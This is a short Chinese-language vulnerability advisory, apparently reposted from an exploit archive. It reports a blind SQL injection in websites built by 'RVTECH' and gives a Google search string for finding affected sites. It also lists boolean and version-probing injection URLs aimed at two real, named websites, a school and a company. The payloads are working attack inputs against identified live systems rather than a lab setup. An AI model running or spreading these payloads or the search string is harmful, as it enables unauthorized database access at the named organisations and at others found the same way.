本文详细分析了RVTECH设计中的盲注SQL注入漏洞,包含具体的漏洞利用方法、测试案例和验证步骤,涉及参数篡改、布尔盲注等技术细节,适用于Web安全研究人员参考。
盲注SQL注入漏洞技术分析
风险等级: 中等
本地漏洞: 否
远程漏洞: 是
CVE: 暂无
CWE: 暂无
搜索关键词: “Design By : RVTECH”
漏洞利用详情
- 漏洞标题: Design By : RVTECH - 盲注SQL注入漏洞
- 发现日期: 2025-05-11
- 漏洞作者: Behrouz Mansoori
- Google搜索语法: “Design By : RVTECH”
- 漏洞分类: Web应用程序漏洞
- 测试环境: Mac系统、Firefox浏览器
漏洞验证步骤
[+] 首先在链接末尾添加"and true",然后添加"and false"进行验证:
示例1:
1
2
3
|
https://www.rainbowpublicschool.org/albumimages.php?id=4%20and%20true--
https://www.rainbowpublicschool.org/albumimages.php?id=4%20and%20false--
https://www.rainbowpublicschool.org/albumimages.php?id=4%20and%20/*!12345substring(@@version,1,1)*/=5--
|
示例2:
1
2
3
|
http://cabstrindia.com/product_category.php?id=6%20and%20true--
http://cabstrindia.com/product_category.php?id=6%20and%20false--
http://cabstrindia.com/product_category.php?id=6%20and%20/*!12345substring(@@version,1,1)*/=5--
|
发现者信息